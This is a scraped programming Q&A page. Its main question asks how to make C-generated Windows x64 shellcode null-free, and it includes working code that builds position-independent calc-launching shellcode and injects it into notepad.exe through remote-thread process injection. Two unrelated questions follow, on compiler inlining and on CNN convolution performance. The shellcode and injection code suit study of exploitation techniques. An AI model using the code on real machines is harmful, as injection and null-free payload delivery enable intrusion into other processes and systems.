How to remove NULL bytes from C generated shellcode? - c

For fun, I'm trying to rewrite this NASM Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) using Windows MSVC x86-64 as shown here:
// Windows x86-64 - Dynamic WinExec Calc.exe Shellcode 479 bytes.
#include <Windows.h>
#include <Winternl.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>
// KERNEL32.DLL
#define NREK 0x004e00520045004b
// GetProcAddress
#define AcorPteG 0x41636f7250746547
// In assembly language, the ret instruction is short for "return."
// It is used to transfer control back to the calling function, typically at the end of a subroutine.
#define RET_INSTRUCTION 0xC3
// Position-independent payload: resolves kernel32.dll via the PEB loader
// list, locates GetProcAddress by hand from kernel32's export table, then
// uses it to find WinExec and launch calc.exe. No string literals or imports
// are referenced -- both names are built on the stack -- which is what allows
// main() to lift this function's bytes out as raw shellcode.
void shell_code_start()
{
// Get the current process' PEB address
// (on x64 Windows, GS points at the TEB and TEB+0x60 holds the PEB pointer)
_PEB* peb = (_PEB*)__readgsqword(0x60);
// Get the address of the loaded module list
PLIST_ENTRY moduleList = &peb->Ldr->InMemoryOrderModuleList;
// Loop through the loaded modules
for (PLIST_ENTRY currentModule = moduleList->Flink; currentModule != moduleList; currentModule = currentModule->Flink)
{
// Compare the first 8 bytes (4 UTF-16 chars) of the module name to "KERN"
// (NREK is that string little-endian-encoded as a 64-bit integer).
// NOTE(review): currentModule points at the entry's InMemoryOrderLinks field,
// not at the start of LDR_DATA_TABLE_ENTRY, so this direct cast reads
// FullDllName at an offset shifted by one LIST_ENTRY. It evidently matches in
// practice, but it relies on that shifted layout -- confirm against the
// winternl.h structure definitions before reusing.
if (*(unsigned long long*)(((LDR_DATA_TABLE_ENTRY*)currentModule)->FullDllName.Buffer) == NREK)
{
// Get the LDR_DATA_TABLE_ENTRY for the current module
// (CONTAINING_RECORD applies the correct offset, unlike the cast above)
PLDR_DATA_TABLE_ENTRY pLdrEntry = CONTAINING_RECORD(currentModule, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
// Get the base address of kernel32.dll
HMODULE kernel32 = (HMODULE)pLdrEntry->DllBase;
// Get the DOS header of kernel32.dll
PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)kernel32;
// Get the NT headers of kernel32.dll
PIMAGE_NT_HEADERS64 pNtHeaders = (PIMAGE_NT_HEADERS64)((BYTE*)pDosHeader + pDosHeader->e_lfanew);
// Get the export directory of kernel32.dll
PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)kernel32 + pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
// Get the array of function addresses of kernel32.dll
DWORD* pAddressOfFunctions = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfFunctions);
// Get the array of name addresses of kernel32.dll
DWORD* pAddressOfNames = (DWORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNames);
// Get the array of ordinal numbers of kernel32.dll
WORD* pAddressOfNameOrdinals = (WORD*)((BYTE*)kernel32 + pExportDirectory->AddressOfNameOrdinals);
// Loop through the names
for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++)
{
// 8-byte compare of the export name against "GetProcA" (AcorPteG is that
// string little-endian-encoded); enough to uniquely match GetProcAddress.
if (*(unsigned long long*)((BYTE*)kernel32 + pAddressOfNames[i]) == AcorPteG)
{
// Compare the name of the current function to "GetProcAddress"
// If it matches, get the address of the function by using the ordinal number
// NOTE(review): assumes the export is not forwarded; true for
// kernel32!GetProcAddress, but a forwarded RVA would not be callable here.
FARPROC getProcAddress = (FARPROC)((BYTE*)kernel32 + pAddressOfFunctions[pAddressOfNameOrdinals[i]]);
// Use GetProcAddress to find the address of WinExec
// (name built char-by-char so no .rdata string literal is referenced)
char winexec[] = { 'W','i','n','E','x','e','c',0 };
FARPROC winExec = ((FARPROC(WINAPI*)(HINSTANCE, LPCSTR))(getProcAddress))(kernel32, winexec);
// Use WinExec to launch calc.exe
char calc[] = { 'c','a','l','c','.','e','x','e',0 };
((FARPROC(WINAPI*)(LPCSTR, UINT))(winExec))(calc, SW_SHOW);
break;
}
}
break;
}
}
}
// Dumps "length" bytes as a C string-literal declaration, 16 bytes per line.
// NULL bytes are wrapped in ANSI color escapes so they stand out in red when
// auditing the shellcode for null-freeness.
//
// Fix: the original unconditionally printed `";` after the loop. When length
// was an exact multiple of 16 the loop had already closed the last line, so
// the trailing `"` opened a new, unterminated string literal in the output.
void print_shellcode(unsigned char* shellcode, int length)
{
    printf("unsigned char shellcode[%d] = \n", length);
    for (int i = 0; i < length; i++)
    {
        if (i % 16 == 0)
        {
            printf("\""); // open a new string-literal line
        }
        if (shellcode[i] == 0x00)
        {
            // highlight the offending NULL byte in red (\x1B[31m ... \033[0m)
            printf("\x1B[31m\\x%02x\033[0m", shellcode[i]);
        }
        else
        {
            printf("\\x%02x", shellcode[i]);
        }
        if ((i + 1) % 16 == 0)
        {
            printf("\"\n"); // close the line after 16 bytes
        }
    }
    // Close the final partial line only if the loop did not already close it.
    if (length % 16 != 0)
    {
        printf("\"");
    }
    printf(";\n");
}
// Scans all running processes and returns the PID of the first one whose
// image file name contains "notepad.exe" (case-insensitive), or 0 if none
// is found or enumeration fails.
//
// Fix: the original `break`-ed out of the loop before CloseHandle when a
// match was found, leaking the process handle; the unused dwSize local is
// also removed.
DWORD GetNotepadPID()
{
    DWORD dwPID = 0;
    DWORD dwProcesses[1024], cbNeeded;
    if (EnumProcesses(dwProcesses, sizeof(dwProcesses), &cbNeeded))
    {
        for (DWORD i = 0; i < cbNeeded / sizeof(DWORD); i++)
        {
            if (dwProcesses[i] != 0)
            {
                HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcesses[i]);
                if (hProcess)
                {
                    TCHAR szProcessName[MAX_PATH] = _T("<unknown>");
                    if (GetProcessImageFileName(hProcess, szProcessName, sizeof(szProcessName) / sizeof(TCHAR)))
                    {
                        _tcslwr(szProcessName); // lower-case for a case-insensitive substring match
                        if (_tcsstr(szProcessName, _T("notepad.exe")) != 0)
                        {
                            dwPID = dwProcesses[i];
                        }
                    }
                    // Always release the handle before leaving the loop body;
                    // the original leaked it when a match was found.
                    CloseHandle(hProcess);
                    if (dwPID != 0)
                    {
                        break;
                    }
                }
            }
        }
    }
    return dwPID;
}
void InjectShellcodeIntoNotepad(unsigned char* shellcode, int length)
{
// Get the handle of the notepad.exe process
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetNotepadPID());
// Allocate memory for the shellcode in the notepad.exe process
LPVOID shellcodeAddr = VirtualAllocEx(hProcess, NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Write the shellcode to the allocated memory in the notepad.exe process
WriteProcessMemory(hProcess, shellcodeAddr, shellcode, length, NULL);
// Create a remote thread in the notepad.exe process to execute the shellcode
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)shellcodeAddr, NULL, 0, NULL);
// Wait for the remote thread to complete
WaitForSingleObject(hThread, INFINITE);
// Clean up
VirtualFreeEx(hProcess, shellcodeAddr, 0, MEM_RELEASE);
CloseHandle(hThread);
CloseHandle(hProcess);
}
// Harness: locates the body of shell_code_start() in this image, measures it
// by scanning for the ret opcode, test-runs it from freshly allocated memory,
// dumps it as a C hex string, and finally injects it into notepad.exe.
//
// Fixes: VirtualFree was called with a non-zero dwSize together with
// MEM_RELEASE, which the API contract forbids (the call fails and the memory
// is leaked); VirtualAlloc's result was also passed to memcpy unchecked.
int main(int argc, char* argv[])
{
    unsigned int rel32 = 0;
    // E9 is the Intel 64 opcode for a jmp instruction with a rel32 offset.
    // The next four bytes contain the 32-bit offset.
    char jmp_rel32[] = { 0xE9, 0x00, 0x00, 0x00, 0x00 };
    // Calculate the relative offset of the jump instruction.
    // NOTE(review): this assumes &shell_code_start points at an E9 thunk
    // (MSVC incremental-linking jump table). In a release build without
    // /INCREMENTAL the symbol is the function body itself and this read
    // returns garbage -- confirm the build settings before relying on it.
    rel32 = *(DWORD*)((char*)shell_code_start + 1);
    // Actual start = thunk address + rel32 + length of the jmp instruction
    // (rel32 is relative to the end of the 5-byte jmp).
    unsigned char *shell_code_start_real = (unsigned char *)shell_code_start + rel32 + sizeof(jmp_rel32);
    // Find the end by scanning for the ret instruction.
    // NOTE(review): stops at the first 0xC3 byte, which can also occur inside
    // an instruction or immediate before the real epilogue -- it works for
    // this function but is fragile in general.
    unsigned char *shell_code_end_real = shell_code_start_real;
    while (*shell_code_end_real++ != RET_INSTRUCTION) {};
    unsigned int sizeofshellcode = shell_code_end_real - shell_code_start_real;
    // Copy the shellcode to freshly allocated memory and execute it...
    LPVOID shellcode_mem = VirtualAlloc(NULL, sizeofshellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (shellcode_mem == NULL)
    {
        return 1; // allocation failed; nothing to test-run
    }
    memcpy(shellcode_mem, shell_code_start_real, sizeofshellcode);
    DWORD old_protect;
    // Drop writability before executing the copy (W^X hygiene)
    VirtualProtect(shellcode_mem, sizeofshellcode, PAGE_EXECUTE_READ, &old_protect);
    void (*jump_to_shellcode)() = (void (*)())shellcode_mem;
    jump_to_shellcode();
    // Release the memory allocated for the shellcode.
    // MEM_RELEASE requires dwSize == 0; the original passed sizeofshellcode,
    // which makes the call fail and leak the region.
    VirtualFree(shellcode_mem, 0, MEM_RELEASE);
    // Print the shellcode in hex format
    print_shellcode(shell_code_start_real, sizeofshellcode);
    // Inject shellcode into the notepad.exe process
    InjectShellcodeIntoNotepad(shell_code_start_real, sizeofshellcode);
    return 0;
}
Everything runs correctly and pops up the Windows calculator.
However, the shellcode often needs to be delivered in a NULL-terminated string. If the shellcode contains NULL bytes, the C code that is being exploited might ignore and drop the rest of the code starting from the first zero byte.
Notice my shellcode has a sparse sprinkling of red NULL bytes!
Update
Based on the comments about modifying the assembly code, it's definitely possible to tweak the shellcode to remove most NULL bytes:
0000000000400000 40 55 push rbp
0000000000400002 48 81 EC F0 00 00 00 sub rsp,0F0h
0000000000400009 48 8D 6C 24 20 lea rbp,[rsp+20h]
000000000040000E 65 48 8B 04 25 60 00 00 00 mov rax,qword ptr gs:[60h]
0000000000400017 48 89 45 00 mov qword ptr [rbp],rax
000000000040001B 48 8B 45 00 mov rax,qword ptr [rbp]
000000000040001F 48 8B 40 18 mov rax,qword ptr [rax+18h]
0000000000400023 48 83 C0 20 add rax,20h
0000000000400027 48 89 45 08 mov qword ptr [rbp+8],rax
000000000040002B 48 8B 45 08 mov rax,qword ptr [rbp+8]
000000000040002F 48 8B 00 mov rax,qword ptr [rax]
0000000000400032 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400036 EB 0B jmp 0000000000400043
0000000000400038 48 8B 45 10 mov rax,qword ptr [rbp+10h]
000000000040003C 48 8B 00 mov rax,qword ptr [rax]
000000000040003F 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400043 48 8B 45 08 mov rax,qword ptr [rbp+8]
0000000000400047 48 39 45 10 cmp qword ptr [rbp+10h],rax
000000000040004B 0F 84 85 01 00 00 je 00000000004001D6
0000000000400051 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400055 48 8B 40 50 mov rax,qword ptr [rax+50h]
0000000000400059 48 B9 4B 00 45 00 52 00 4E 00 mov rcx,4E00520045004Bh
0000000000400063 48 39 08 cmp qword ptr [rax],rcx
0000000000400066 0F 85 65 01 00 00 jne 00000000004001D1
000000000040006C 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400070 48 83 E8 10 sub rax,10h
0000000000400074 48 89 45 18 mov qword ptr [rbp+18h],rax
0000000000400078 48 8B 45 18 mov rax,qword ptr [rbp+18h]
000000000040007C 48 8B 40 30 mov rax,qword ptr [rax+30h]
0000000000400080 48 89 45 20 mov qword ptr [rbp+20h],rax
0000000000400084 48 8B 45 20 mov rax,qword ptr [rbp+20h]
0000000000400088 48 89 45 28 mov qword ptr [rbp+28h],rax
000000000040008C 48 8B 45 28 mov rax,qword ptr [rbp+28h]
0000000000400090 48 63 40 3C movsxd rax,dword ptr [rax+3Ch]
0000000000400094 48 8B 4D 28 mov rcx,qword ptr [rbp+28h]
0000000000400098 48 03 C8 add rcx,rax
000000000040009B 48 8B C1 mov rax,rcx
000000000040009E 48 89 45 30 mov qword ptr [rbp+30h],rax
00000000004000A2 B8 08 00 00 00 mov eax,8
00000000004000A7 48 6B C0 00 imul rax,rax,0
00000000004000AB 48 8B 4D 30 mov rcx,qword ptr [rbp+30h]
00000000004000AF 8B 84 01 88 00 00 00 mov eax,dword ptr [rcx+rax+88h]
00000000004000B6 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000BA 48 03 C8 add rcx,rax
00000000004000BD 48 8B C1 mov rax,rcx
00000000004000C0 48 89 45 38 mov qword ptr [rbp+38h],rax
00000000004000C4 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000C8 8B 40 1C mov eax,dword ptr [rax+1Ch]
00000000004000CB 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000CF 48 03 C8 add rcx,rax
00000000004000D2 48 8B C1 mov rax,rcx
00000000004000D5 48 89 45 40 mov qword ptr [rbp+40h],rax
00000000004000D9 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000DD 8B 40 20 mov eax,dword ptr [rax+20h]
00000000004000E0 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000E4 48 03 C8 add rcx,rax
00000000004000E7 48 8B C1 mov rax,rcx
00000000004000EA 48 89 45 48 mov qword ptr [rbp+48h],rax
00000000004000EE 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000F2 8B 40 24 mov eax,dword ptr [rax+24h]
00000000004000F5 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000F9 48 03 C8 add rcx,rax
00000000004000FC 48 8B C1 mov rax,rcx
00000000004000FF 48 89 45 50 mov qword ptr [rbp+50h],rax
0000000000400103 C7 45 58 00 00 00 00 mov dword ptr [rbp+58h],0
000000000040010A EB 08 jmp 0000000000400114
000000000040010C 8B 45 58 mov eax,dword ptr [rbp+58h]
000000000040010F FF C0 inc eax
0000000000400111 89 45 58 mov dword ptr [rbp+58h],eax
0000000000400114 48 8B 45 38 mov rax,qword ptr [rbp+38h]
0000000000400118 8B 40 18 mov eax,dword ptr [rax+18h]
000000000040011B 39 45 58 cmp dword ptr [rbp+58h],eax
000000000040011E 0F 83 AB 00 00 00 jae 00000000004001CF
0000000000400124 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400127 48 8B 4D 48 mov rcx,qword ptr [rbp+48h]
000000000040012B 8B 04 81 mov eax,dword ptr [rcx+rax*4]
000000000040012E 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
0000000000400132 48 BA 47 65 74 50 72 6F 63 41 mov rdx,41636F7250746547h
000000000040013C 48 39 14 01 cmp qword ptr [rcx+rax],rdx
0000000000400140 0F 85 84 00 00 00 jne 00000000004001CA
0000000000400146 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400149 48 8B 4D 50 mov rcx,qword ptr [rbp+50h]
000000000040014D 0F B7 04 41 movzx eax,word ptr [rcx+rax*2]
0000000000400151 48 8B 4D 40 mov rcx,qword ptr [rbp+40h]
0000000000400155 8B 04 81 mov eax,dword ptr [rcx+rax*4]
0000000000400158 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040015C 48 03 C8 add rcx,rax
000000000040015F 48 8B C1 mov rax,rcx
0000000000400162 48 89 45 60 mov qword ptr [rbp+60h],rax
0000000000400166 C6 45 68 57 mov byte ptr [rbp+68h],57h
000000000040016A C6 45 69 69 mov byte ptr [rbp+69h],69h
000000000040016E C6 45 6A 6E mov byte ptr [rbp+6Ah],6Eh
0000000000400172 C6 45 6B 45 mov byte ptr [rbp+6Bh],45h
0000000000400176 C6 45 6C 78 mov byte ptr [rbp+6Ch],78h
000000000040017A C6 45 6D 65 mov byte ptr [rbp+6Dh],65h
000000000040017E C6 45 6E 63 mov byte ptr [rbp+6Eh],63h
0000000000400182 C6 45 6F 00 mov byte ptr [rbp+6Fh],0
0000000000400186 48 8D 55 68 lea rdx,[rbp+68h]
000000000040018A 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040018E FF 55 60 call qword ptr [rbp+60h]
0000000000400191 48 89 45 70 mov qword ptr [rbp+70h],rax
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
00000000004001BC BA 05 00 00 00 mov edx,5
00000000004001C1 48 8D 4D 78 lea rcx,[rbp+78h]
00000000004001C5 FF 55 70 call qword ptr [rbp+70h]
00000000004001C8 EB 05 jmp 00000000004001CF
00000000004001CA E9 3D FF FF FF jmp 000000000040010C
00000000004001CF EB 05 jmp 00000000004001D6
00000000004001D1 E9 62 FE FF FF jmp 0000000000400038
00000000004001D6 48 8D A5 D0 00 00 00 lea rsp,[rbp+0D0h]
00000000004001DD 5D pop rbp
00000000004001DE C3 ret
Although I'm not sure how to handle a NULL-terminated string such as "calc.exe" which generates 4 NULL bytes:
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
Question
Is it possible to remove the NULL bytes by reshuffling the C code or maybe using compiler intrinsic tricks?

Related

Inline functions expansion with inner switch

Consider the scenario where you have a complex procedure that have a state machine and is tracked with a state that never changes during a call to kernel, as in code illustrated below.
/* Forward declarations: kernel calls mode1/mode2 before their definitions
 * (the original relied on implicit declarations, an error since C99). */
void mode1(int recursion);
void mode2(int recursion);

/* State-machine core: "mode" is constant for the whole recursive descent, so
 * an inlining compiler can fold the switch away inside each wrapper.
 * The missing breaks are intentional -- case 1 falls through into case 2. */
static inline void kernel(int recursion, int mode){
    if(!recursion) return;
    // branches all lead to similar switch cases here.
    // logical branches and loops can be quite complicated.
    switch(mode){
    default: return;            /* fixed: original read "default return;" */
    case 1: mode1(recursion-1); /* fallthrough (intentional) */
    case 2: mode2(recursion-1);
    }
}
void mode1(int recursion){
    kernel(recursion,1); /* fixed: missing semicolon */
}
void mode2(int recursion){
    kernel(recursion,2); /* fixed: missing semicolon */
}
If only mode1 and mode2 functions are called elsewhere, can recent compilers eliminate the inner branches?
All functions are in the same compilation unit.
Came across this while implementing an interpreter for a subset of SPIR-V bytecode. The inner branch is for finding out how much to allocate, building up the AST, and doing the actual evaluation of expressions. The kernel takes care of traversing the tree, with all the switches on instruction opcodes. Writing separate functions for each state would be even more difficult to maintain, since the kernel already takes up 1000+ lines of code, and keeping the same traversal points in sync across copies can be really difficult.
(I know modern c++ have constexpr if, but this is pure c code.)
Edit:
I've tried with msvc compiler with the following code:
uint32_t interp_code[]={1,2,1,1,2};
void mode1(const uint32_t* code, int recursion);
void mode2(const uint32_t* code, int recursion);
// Interpreter core: *code drives the data-dependent dispatch while "mode" is
// the state threaded through the recursion, constant per entry point.
// INLINE is a placeholder macro bound to either `inline` or `__forceinline`
// for the codegen comparison discussed below. The inner switches deliberately
// omit break -- case 1 falls through into case 2 (the text below confirms the
// fallthrough is intended).
static INLINE void kernel(const uint32_t* code, int recursion, int mode)
{
if (!recursion) return;
// branches all lead to similar switch cases here.
// logical branches and loops can be quite complicated.
switch (*code) {
default: return;
case 1:
switch (mode) {
default: return;
case 1: mode1(code + 1, recursion - 1); /* fallthrough */
case 2: mode2(code + 1, recursion - 1);
}
/* fallthrough into case 2 of the outer switch */
case 2:
switch(mode) {
default: return;
case 1: mode2(code + 1, recursion - 1); /* fallthrough */
case 2: mode1(code + 1, recursion - 1);
}
}
}
// Public entry points: each pins "mode" to a constant so that, when kernel is
// inlined, the compiler can fold the switch (mode) dispatch away entirely.
void mode1(const uint32_t* code,int recursion)
{
kernel(code, recursion, 1);
}
void mode2(const uint32_t* code, int recursion)
{
kernel(code, recursion, 2);
}
int main()
{
// Drive the interpreter over the 5-element interp_code program.
mode1(interp_code, 5);
return 0;
}
Using inline in the INLINE place yielded a function call (O2 optimizations), and using __forceinline yields the two modes compiled separately with no function call.
Disassembly for inline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF65F8910C0 48 83 EC 28 sub rsp,28h
33: kernel(code, recursion, 1);
00007FF65F8910C4 85 D2 test edx,edx
00007FF65F8910C6 74 6C je mode1+74h (07FF65F891134h)
00007FF65F8910C8 48 89 5C 24 30 mov qword ptr [rsp+30h],rbx
00007FF65F8910CD 48 8D 59 04 lea rbx,[rcx+4]
00007FF65F8910D1 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF65F8910D6 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF65F8910DB 8D 7A FF lea edi,[rdx-1]
00007FF65F8910DE 66 90 xchg ax,ax
00007FF65F8910E0 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF65F8910E3 8B F7 mov esi,edi
00007FF65F8910E5 83 E9 01 sub ecx,1
00007FF65F8910E8 74 07 je mode1+31h (07FF65F8910F1h)
00007FF65F8910EA 83 F9 01 cmp ecx,1
00007FF65F8910ED 75 36 jne mode1+65h (07FF65F891125h)
00007FF65F8910EF EB 1A jmp mode1+4Bh (07FF65F89110Bh)
00007FF65F8910F1 8B D7 mov edx,edi
00007FF65F8910F3 48 8B CB mov rcx,rbx
00007FF65F8910F6 E8 C5 FF FF FF call mode1 (07FF65F8910C0h)
00007FF65F8910FB 41 B8 02 00 00 00 mov r8d,2
00007FF65F891101 8B D7 mov edx,edi
00007FF65F891103 48 8B CB mov rcx,rbx
00007FF65F891106 E8 F5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89110B 41 B8 02 00 00 00 mov r8d,2
00007FF65F891111 8B D7 mov edx,edi
00007FF65F891113 48 8B CB mov rcx,rbx
00007FF65F891116 E8 E5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89111B FF CF dec edi
00007FF65F89111D 48 83 C3 04 add rbx,4
00007FF65F891121 85 F6 test esi,esi
00007FF65F891123 75 BB jne mode1+20h (07FF65F8910E0h)
00007FF65F891125 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF65F89112A 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF65F89112F 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF65F891134 48 83 C4 28 add rsp,28h
00007FF65F891138 C3 ret
For __forceinline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF670271002 EC in al,dx
00007FF670271003 28 85 D2 74 60 48 sub byte ptr [rbp+486074D2h],al
33: kernel(code, recursion, 1);
00007FF670271009 89 5C 24 30 mov dword ptr [rsp+30h],ebx
00007FF67027100D 48 8D 59 04 lea rbx,[rcx+4]
00007FF670271011 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF670271016 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF67027101B 8D 7A FF lea edi,[rdx-1]
00007FF67027101E 66 90 xchg ax,ax
00007FF670271020 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF670271023 8B F7 mov esi,edi
00007FF670271025 83 E9 01 sub ecx,1
00007FF670271028 74 07 je mode1+31h (07FF670271031h)
00007FF67027102A 83 F9 01 cmp ecx,1
00007FF67027102D 75 2A jne mode1+59h (07FF670271059h)
00007FF67027102F EB 14 jmp mode1+45h (07FF670271045h)
00007FF670271031 8B D7 mov edx,edi
00007FF670271033 48 8B CB mov rcx,rbx
00007FF670271036 E8 C5 FF FF FF call mode1 (07FF670271000h)
00007FF67027103B 8B D7 mov edx,edi
00007FF67027103D 48 8B CB mov rcx,rbx
00007FF670271040 E8 2B 00 00 00 call mode2 (07FF670271070h)
00007FF670271045 8B D7 mov edx,edi
00007FF670271047 48 8B CB mov rcx,rbx
00007FF67027104A E8 21 00 00 00 call mode2 (07FF670271070h)
00007FF67027104F FF CF dec edi
00007FF670271051 48 83 C3 04 add rbx,4
00007FF670271055 85 F6 test esi,esi
00007FF670271057 75 C7 jne mode1+20h (07FF670271020h)
00007FF670271059 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF67027105E 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF670271063 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF670271068 48 83 C4 28 add rsp,28h
00007FF67027106C C3 ret
It seems with inline the compiler chose to inline the entirety of mode2 function body, and make kernel a separate function call. __forceinline forced the mode1 and mode2 to compile into two function bodies with the kernel. (This code doesn't break on the case, so fall through is expected)
Using the plain inline keyword for INLINE yields the same code at O2 as leaving INLINE empty.

Convolution Function Latency Bottleneck

I have implemented a Convolutional Neural Network in C and have been studying what parts of it have the longest latency.
Based on my research, the massive amount of matrix multiplication required by CNNs makes running them on CPUs and even GPUs very inefficient. However, when I actually profiled my code (on an unoptimized build) I found out that something other than the multiplication itself was the bottleneck of the implementation.
After turning on optimization (-O3 -march=native -ffast-math, gcc cross compiler), the Gprof result was the following:
Clearly, the convolution2D function takes the largest amount of time to run, followed by the batch normalization and depthwise convolution functions.
The convolution function in question looks like this:
// Direct 2-D convolution with zero padding: for every output pixel (oy, ox)
// and output channel od, accumulates kdata[od] dotted with the input window,
// skipping input positions that fall outside [0, isize).
//
// Fix/optimization: the original accumulated straight into
// odata[oy][ox][od] inside the innermost loop, forcing a store+reload per
// multiply (visible as vmovss to/from [r8] in the posted disassembly) and
// blocking vectorization because the compiler must assume odata may alias
// the inputs. A local accumulator performs the additions in the exact same
// order, so the results are bit-identical. The iy computation and bounds
// check are also hoisted out of the kx loop (they depend only on ky).
void convolution2D(int isize, // width/height of input
int osize, // width/height of output
int ksize, // width/height of kernel
int stride, // shift between input pixels, between consecutive outputs
int pad, // offset between (0,0) pixels between input and output
int idepth, int odepth, // number of input and output channels
float idata[isize][isize][idepth],
float odata[osize][osize][odepth],
float kdata[odepth][ksize][ksize][idepth])
{
    // iterate over the output
    for (int oy = 0; oy < osize; ++oy) {
        for (int ox = 0; ox < osize; ++ox) {
            for (int od = 0; od < odepth; ++od) {
                float sum = 0.0f; // register accumulator; stored once below
                for (int ky = 0; ky < ksize; ++ky) {
                    // map kernel row to input row (depends only on ky)
                    int iy = stride * oy + ky - pad;
                    if (iy < 0 || iy >= isize)
                        continue; // whole kernel row falls outside the input
                    for (int kx = 0; kx < ksize; ++kx) {
                        int ix = stride * ox + kx - pad;
                        // use only valid inputs
                        if (ix >= 0 && ix < isize)
                            for (int id = 0; id < idepth; ++id)
                                sum += kdata[od][ky][kx][id] * idata[iy][ix][id];
                    }
                }
                // single store replaces the per-iteration read-modify-write
                odata[oy][ox][od] = sum;
            }
        }
    }
}
This is a design based on my previous question and most of the processing time should fall on the convolution itself: odata[oy][ox][od] += kdata[od][ky][kx][id] * idata[iy][ix][id];.
Using objdump -drwC -Mintel to take a look at the assembly code returns me the following:
0000000000007880 <convolution2D>:
7880: f3 0f 1e fa endbr64
7884: 55 push rbp
7885: 48 89 e5 mov rbp,rsp
7888: 41 57 push r15
788a: 41 56 push r14
788c: 41 55 push r13
788e: 41 54 push r12
7890: 53 push rbx
7891: 48 81 ec b0 00 00 00 sub rsp,0xb0
7898: ff 15 4a a7 00 00 call QWORD PTR [rip+0xa74a] # 11fe8 <mcount#GLIBC_2.2.5>
789e: 89 d3 mov ebx,edx
78a0: 89 55 a8 mov DWORD PTR [rbp-0x58],edx
78a3: 89 8d 74 ff ff ff mov DWORD PTR [rbp-0x8c],ecx
78a9: 49 63 d1 movsxd rdx,r9d
78ac: 48 63 cf movsxd rcx,edi
78af: 41 89 f2 mov r10d,esi
78b2: 89 b5 38 ff ff ff mov DWORD PTR [rbp-0xc8],esi
78b8: 49 63 c0 movsxd rax,r8d
78bb: 48 0f af ca imul rcx,rdx
78bf: 48 63 75 10 movsxd rsi,DWORD PTR [rbp+0x10]
78c3: 49 89 d6 mov r14,rdx
78c6: 4c 8d 24 95 00 00 00 00 lea r12,[rdx*4+0x0]
78ce: 41 89 fd mov r13d,edi
78d1: 49 89 cb mov r11,rcx
78d4: 48 89 8d 60 ff ff ff mov QWORD PTR [rbp-0xa0],rcx
78db: 49 63 ca movsxd rcx,r10d
78de: 4c 8d 0c b5 00 00 00 00 lea r9,[rsi*4+0x0]
78e6: 49 89 f0 mov r8,rsi
78e9: 48 0f af f1 imul rsi,rcx
78ed: 48 63 cb movsxd rcx,ebx
